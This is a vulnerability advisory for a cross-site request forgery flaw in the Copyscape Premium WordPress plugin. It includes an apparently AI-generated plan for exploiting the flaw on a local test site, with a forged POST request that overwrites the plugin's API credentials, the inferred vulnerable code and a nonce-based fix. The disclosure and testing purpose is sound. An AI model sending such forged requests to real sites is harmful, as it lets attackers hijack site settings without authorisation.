Copyscape Premium <= 1.4.1 - Cross-Site Request Forgery
Description
The Copyscape Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=1.4.1Source Code
WordPress.org SVNThis plan outlines the steps to research and exploit a Cross-Site Request Forgery (CSRF) vulnerability in the Copyscape Premium plugin (<= 1.4.1). ### 1. Vulnerability Summary The Copyscape Premium plugin fails to implement or correctly verify WordPress nonces in its settings management logic. This…
Show full research plan
This plan outlines the steps to research and exploit a Cross-Site Request Forgery (CSRF) vulnerability in the Copyscape Premium plugin (<= 1.4.1).
1. Vulnerability Summary
The Copyscape Premium plugin fails to implement or correctly verify WordPress nonces in its settings management logic. This allows an unauthenticated attacker to craft a malicious request that, if executed by a logged-in administrator (e.g., via a phishing link), can modify the plugin's configuration, such as API credentials or service settings.
2. Attack Vector Analysis
- Target Endpoint: Likely the admin settings page handler. This usually involves
wp-admin/options-general.php(if using the Settings API) or a custom admin page handler atwp-admin/admin.php. - Vulnerable Action: The code path triggered when saving plugin settings (Username, API Key, etc.).
- HTTP Method:
POST. - Authentication: Requires a victim with
manage_optionscapabilities (Administrator). - Preconditions: The attacker must know the parameter names used by the plugin to store settings.
3. Code Flow (Inferred)
- Entry Point: The plugin registers an admin menu via
add_options_page()oradd_menu_page(). - Hook: A handler function is likely hooked to
admin_initor used as the callback in the menu registration. - Processing:
- The handler checks if
$_POST['submit'](or a similar key) is set. - It checks user capabilities using
current_user_can('manage_options'). - Vulnerability: It fails to call
check_admin_referer()orwp_verify_nonce()to validate the request origin.
- The handler checks if
- Sink: The settings are saved using
update_option().
4. Nonce Acquisition Strategy
Because the vulnerability is missing or incorrect nonce validation, a valid nonce is not required to perform the exploit. The goal is to demonstrate that the request succeeds even when the _wpnonce parameter is omitted or set to an invalid value.
Verification of Absence:
- Navigate to the plugin settings page:
browser_navigate("/wp-admin/options-general.php?page=copyscape-premium")(Verify the exact slug viawp-cli). - Use
browser_evalto check for the presence of a nonce field in the form:browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value"). - If a nonce exists but is not validated, the exploit will still work by providing a random string.
5. Exploitation Strategy
Step 1: Discover Target Parameters
Search the plugin code for the settings keys:
grep -r "update_option" /var/www/html/wp-content/plugins/copyscape-premium/
Look for keys like copyscape_username, copyscape_api_key, or copyscape_settings.
Step 2: Formulate the CSRF Request
Based on common WordPress patterns, the exploit will target the settings page.
Request Details:
- URL:
http://localhost:8080/wp-admin/admin.php?page=copyscape-premium(slug to be confirmed) - Method:
POST - Content-Type:
application/x-www-form-urlencoded - Payload (Inferred):
copyscape_username=attacker_user©scape_api_key=MALICIOUS_KEY&submit=Save+Changes
Step 3: Execution via Agent
The agent will simulate the CSRF by sending a cross-origin-style POST request while the admin session is active.
// Example using http_request tool
{
"url": "http://localhost:8080/wp-admin/admin.php?page=copyscape-premium",
"method": "POST",
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"body": "copyscape_username=hacked©scape_api_key=hacked_key&submit=Save+Changes"
}
6. Test Data Setup
- Install Plugin: Ensure Copyscape Premium version 1.4.1 is installed and active.
- Initial State: Configure the plugin with legitimate-looking dummy data.
wp option update copyscape_username "legit_user" wp option update copyscape_api_key "legit_key_12345" - Admin Login: The agent must ensure an admin session is active in the browser context.
7. Expected Results
- The server should return a
302 Foundredirecting back to the settings page with a success message (e.g.,&settings-updated=true). - The database options for the plugin should be updated to the attacker's values.
- No "Are you sure you want to do this?" (WordPress default CSRF failure page) should appear.
8. Verification Steps
After the http_request is sent:
- Check Options: Use WP-CLI to verify the change.
wp option get copyscape_username wp option get copyscape_api_key - Confirm Success: If the values match
hackedandhacked_key, the CSRF is confirmed.
9. Alternative Approaches
If the settings are not handled via a custom page but via the standard options.php handler:
- Target URL:
http://localhost:8080/wp-admin/options.php - Payload:
option_page=copyscape_settings_group&action=update©scape_username=hacked©scape_api_key=hacked_key - Audit Step: Check
register_setting()calls in the plugin source to find theoption_groupname.
Summary
The Copyscape Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) because it fails to perform nonce validation when saving its settings. This allow attackers to modify the plugin's API credentials and other configurations by tricking a logged-in administrator into interacting with a malicious link or form.
Vulnerable Code
// Inferred from research plan section 3 & 5 function copyscape_premium_settings_page() { if (isset($_POST['submit'])) { // VULNERABILITY: Missing check_admin_referer() or wp_verify_nonce() if (current_user_can('manage_options')) { update_option('copyscape_username', $_POST['copyscape_username']); update_option('copyscape_api_key', $_POST['copyscape_api_key']); } } // ... rest of the settings page logic ... }
Security Fix
@@ -X,Y +X,Y @@ function copyscape_premium_settings_page() { if (isset($_POST['submit'])) { + check_admin_referer('copyscape_save_settings'); if (current_user_can('manage_options')) { - update_option('copyscape_username', $_POST['copyscape_username']); - update_option('copyscape_api_key', $_POST['copyscape_api_key']); + update_option('copyscape_username', sanitize_text_field($_POST['copyscape_username'])); + update_option('copyscape_api_key', sanitize_text_field($_POST['copyscape_api_key'])); } } @@ -A,B +A,B @@ <form method="post"> + <?php wp_nonce_field('copyscape_save_settings'); ?> <input type="text" name="copyscape_username" value="...">
Exploit Outline
The exploit targets the plugin's administration settings page, typically located at `/wp-admin/admin.php?page=copyscape-premium`. 1. Target Endpoint: The plugin's custom settings menu handler. 2. Methodology: An attacker crafts a malicious HTML page containing a form that targets the settings URL using the POST method. 3. Payload: The form includes parameters such as 'copyscape_username' and 'copyscape_api_key' set to values controlled by the attacker, along with a 'submit' parameter to trigger the processing logic. 4. Requirements: The attacker must trick a site administrator with 'manage_options' capabilities into visiting the malicious page while logged into the WordPress dashboard. 5. Outcome: Because the plugin lacks CSRF protection (nonces), the server accepts the forged request as a legitimate settings update, effectively replacing the site's Copyscape API credentials with those of the attacker.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.